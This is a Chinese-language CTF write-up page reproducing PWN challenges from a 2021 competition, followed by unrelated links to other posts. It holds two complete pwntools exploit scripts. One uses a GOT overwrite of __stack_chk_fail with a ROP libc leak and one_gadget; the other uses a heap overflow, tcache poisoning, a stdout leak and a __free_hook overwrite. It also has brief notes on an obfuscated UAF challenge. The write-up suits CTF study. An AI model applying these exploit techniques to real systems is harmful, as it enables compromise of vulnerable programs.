bbbaby

控制__stack_chk_fail,栈溢出

from pwn import *

context.os = 'linux'

context.log_level = "debug"

context.arch = 'amd64'

p = process('./pwn1')#, env={"LD_PRELOAD":'./libc-2.27.so'})

libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

elf = ELF('./pwn1')

s       = lambda data               :p.send(str(data))

sa      = lambda delim,data         :p.sendafter(str(delim), str(data))

sl      = lambda data               :p.sendline(str(data))

sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))

r       = lambda num                :p.recv(num)

ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)

itr     = lambda                    :p.interactive()

uu32    = lambda data               :u32(data.ljust(4,b'\x00'))

uu64    = lambda data               :u64(data.ljust(8,b'\x00'))

leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

def debug():

	gdb.attach(p)

	pause()

puts_plt = elf.plt['puts']

puts_got = elf.got['puts']

chk_fail = elf.got['__stack_chk_fail']

rdi = 0x0000000000400a03

pl = 'a'*0x118 + p64(rdi) + p64(puts_got) + p64(puts_plt) + p64(0x000000000040086C) + p64(0x00000000004008BB)

p.sendlineafter('choice\n','0')

p.sendlineafter('address:\n',str(chk_fail))

p.sendafter('content:\n',p64(puts_plt))

p.sendlineafter('your choice\n','1')

p.sendlineafter('size:\n',str(0x1000))

p.sendafter('content:\n',pl)

p.sendlineafter('choice\n','2')

libcbase = uu64(r(6)) - libc.sym['puts']

ogg = libcbase + 0x4f322

pl = 'a'*0x118 + p64(ogg)

p.sendlineafter('your choice\n','1')

p.sendlineafter('size:\n',str(0x1000))

p.sendafter('content:\n',pl)

p.sendlineafter('choice\n','2')

itr()

Magic

打开一看

熟悉,像是控制流平坦化,不是,就是控制流平坦化混淆。

清楚llvm的混淆原理,那就慢慢分析叭

很简单就一个emmm uaf就完了主要难在分析上。

由于没有2.23的环境就不打了emmm

h3apclass

ren出的题目

这里是存在溢出的,如果把堆块填满的话这里就可以写到下一个堆块的size位置,造成类似off by one的效果,开启了沙盒,心中默念orw优先考虑栈迁移!!!!

已经劫持了,由于16分之一跳起来太难就不搞了

from pwn import *

context.arch = 'amd64'

context.log_level = 'debug'

#p = remote('39.99.242.16',10002)

p = process('./H3apClass')#, env={"LD_PRELOAD":'./libc.so.6'})

elf=ELF('./H3apClass')

libc = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')

s       = lambda data               :p.send(str(data))

sa      = lambda delim,data         :p.sendafter(str(delim), str(data))

sl      = lambda data               :p.sendline(str(data))

sla     = lambda delim,data         :p.sendlineafter(str(delim), str(data))

r       = lambda num                :p.recv(num)

ru      = lambda delims, drop=True  :p.recvuntil(delims, drop)

itr     = lambda                    :p.interactive()

uu32    = lambda data               :u32(data.ljust(4,b'\x00'))

uu64    = lambda data               :u64(data.ljust(8,b'\x00'))

leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))

def debug():

   gdb.attach(p)

   pause()

def add(idx,size,content):

	sla('4:Drop homework\n',1)

	sla('Which homework?\n',idx)

	sla('size:\n',size)

	p.sendafter('content:\n',content)

def edit(idx,content):

	sla('4:Drop homework\n',3)

	sla('Which homework?\n',idx)

	p.sendafter('content:\n',content)

def delete(idx):

	sla('4:Drop homework\n',4)

	sla('Which homework?\n',idx)

add(0,0x18,'b'*0x18)

add(1,0xf8,'bpc')

add(2,0xf8,'bpc')

add(3,0xf8,'bpc')

add(4,0xf8,'bpc')

add(5,0xf8,'bpc')

delete(5)

delete(4)

delete(3)

delete(2)

add(2,0xe8,'bpc')

add(3,0xe8,'bpc')

add(4,0xe8,'bpc')

add(5,0x18,'bpc')

pl = b'a'*0x18 + p16(0x7d1)

edit(0,pl)

delete(1)

delete(4)

delete(3)

delete(2)

add(2,0x70,'bpc')

add(3,0x70,'bpc')

add(4,0x10,'\xa0\x36')

delete(3)

delete(2)

add(2,0xf8,'bpc')

add(3,0xf8,p64(0xfbad1887)+p64(0)*3+b'\x00')

libcbase = uu64((ru('\x7f')[-5:]+b'\x7f')) - 0x1EC980

leak('libcbase',libcbase)

free = libcbase + libc.sym['__free_hook']

pl = b'a'*0x18 + p8(0x81)

edit(0,pl)

delete(0)

delete(1)

delete(5)

delete(4)

edit(2,p64(free)[:6])

add(0,0x18,'bpc')

add(1,0x18,'bpc')

ogg = libcbase + 0x154DD0

add(4,0x18,p64(ogg))

debug()

p.interactive()

[复现]陇原战"疫"2021网络安全大赛-PWN的更多相关文章

  1. Writeup:第五届上海市大学生网络安全大赛-Web

    目录 Writeup:第五届上海市大学生网络安全大赛-Web 一.Decade 无参数函数RCE(./..) 二.Easysql 三.Babyt5 二次编码绕过strpos Description: ...

  2. 2019年上海市大学生网络安全大赛两道misc WriteUp

    2019年全国大学生网络安全邀请赛暨第五届上海市大学生网络安全大赛 做出了两道Misc== 签到 题干 解题过程 题干提示一直注册成功,如果注册失败也许会出现flag. 下载下来是包含010edito ...

  3. 全面解析百度大脑发布“AI开发者‘战疫’守护计划”

    即日起,百度大脑发布“AI开发者战疫守护计划” 大疫当前,人人有责,携手开发者共同出击抗击疫情 基于百度大脑AI开放平台和飞桨深度学习平台,积极运用算法.算力.软件等“武器”助力抗疫!   谁能参与计 ...

  4. 百度大脑发布“AI开发者‘战疫’守护计划”,AI支援抗疫再升级

    面对新冠肺炎疫情,AI开发者们正在积极运用算法.算力.软件等“武器”助力抗疫.针对开发者们在疫情防控期间的开发与学习需求,2月6日,百度大脑推出“AI开发者‘战疫’守护计划”, 正在进行疫情防控相关应 ...

  5. 【巨杉数据库SequoiaDB】为“战疫” 保驾护航,巨杉在行动

    2020年,我们经历了一个不平静的新春,在这场大的“战疫”中,巨杉数据库也积极响应号召,勇于承担新一代科技企业的社会担当,用自己的行动助力这场疫情防控阻击战! 赋能“战疫”快速响应 巨杉数据库目前服务 ...

  6. 助力企业战疫提效保质,腾讯wetest远程办公工具包请查收!

    导语 疫情当前,减少个人的出行与聚集成为了抗击疫情的重要防线.不少企业为了员工的安全与战疫的目标,开始实行在家远程办公的措施.作为开发测试人员,对工作环境与设备软件的条件要求相对较高,当前在远程办公的 ...

  7. 2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup

    2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup 2020年网鼎杯白虎组赛题.zip下载 https://download.csdn.net/download/jameswhit ...

  8. [原题复现][2020i春秋抗疫赛] WEB blanklist(SQL堆叠注入、handler绕过)

    简介 今天参加i春秋新春抗疫赛 一道web没整出来 啊啊啊 好垃圾啊啊啊啊啊啊啊  晚上看群里赵师傅的buuoj平台太屌了分分钟上线 然后赵师傅还分享了思路用handler语句绕过select过滤.. ...

  9. 高校战“疫”网络安全分享赛 Misc ez_mem&usb

    打开之后是一个流量包 用wireshark导出HTTP文件,有个upload,用一下binwalk,出来了一个镜像文件 用volatility搜一下,命令里有一个密码,看见了但是后来给忘了... 文件 ...

  10. IT运维软件免费送 智和信通战疫活动火热进行中

    突如其来的“新型冠状病毒”疫情牵动了全国人民的心,这是一场与病毒抗争,为生命逆行与时间赛跑的战役.举国上下众志成城面对疫情,在线医疗.在线教学.在线办公.在线会议.电商销售成为热点.线上经济的火热给企 ...

随机推荐

  1. 二进制安装K8S kubctl get node 返回No resources found

    问题描述:node节点kubelet服务启动成功后,在集群master节点执行命令具体结果如下截图 原因:kubelet设置的cgroups和docker的不一致导致 修改docker的cgroup, ...

  2. 35.Linux 性能监控常用命令

    内存 top CPU yum install -y sysstat mpstat 网络 netstat //参数说明 //-n:拒绝显示别卖,能显示数字的全部转化数字 //-l:仅列出Listen(监 ...

  3. 2022.11.09 NOIP2022 模拟赛六

    科学 Source:CF461C Appleman and a Sheet of Paper,*2200. 注意到对于 \(p\le \lfloor \frac {now}{2}\rfloor\),直 ...

  4. Joseph Problem With Passwords In Java

    问题描述: 编号为1,2,......,n的n个人(每个人的信息有编号.姓名和密码三项)按照顺时针方向围坐一圈, 每个人有且只有一个密码(正整数,密码用随机方式赋值,范围1-15).一开始任选一个正整 ...

  5. iOS开发之实现自定义浮动操作框效果

    今天有个需求是如上图实现类似微信的自定义浮动操作框效果 我自己就写了个demo,大家感兴趣的可以试试,下面是代码 VC代码如下 #import "TestCustomMenuItemVC.h ...

  6. bcc分析缓存命中率

    系统环境:centos7/redhat7 安装,提前配好网络yum源,比如aliyun yum install bcc-tools /etc/profile 添加如下命令路径 vim /etc/pro ...

  7. holiday09

    第九天 ping # 检测目标主机是否连接正常 $ ping IP地址 # 检测本地网卡工作正常 $ ping 127.0.0.1 ping 一般用于检测当前计算机到目标计算机之间的网络 是否通畅,数 ...

  8. Python 用exec来获取字符串所对应的字典

    Python 用exec来获取字符串所对应的字典 Python exec 问题的提出 想要遍历两个结构相似的字典,但是不想采用字典内嵌套字典的方式,所以想要通过一个列表,该列表包含字典名称.也就是通过 ...

  9. 微信小程序:微信web开发阶段性学习总结

    小程序运行机制 前台/后台状态 小程序启动后,界面被展示给用户,此时小程序处于前台状态. 当用户点击右上角胶囊按钮关闭小程序,或者按了设备 Home 键离开微信时,小程序并没有完全终止运行,而是进入了 ...

  10. python机器学习——决策树算法

    背景与原理: 决策树算法是在各种已知情况发生概率的基础上通过构成决策树来求某一事件发生概率的算法,由于这个过程画成图解之后很像一棵树形结构,因此我们把这个算法称为决策树. 而在机器学习中,决策树是一种 ...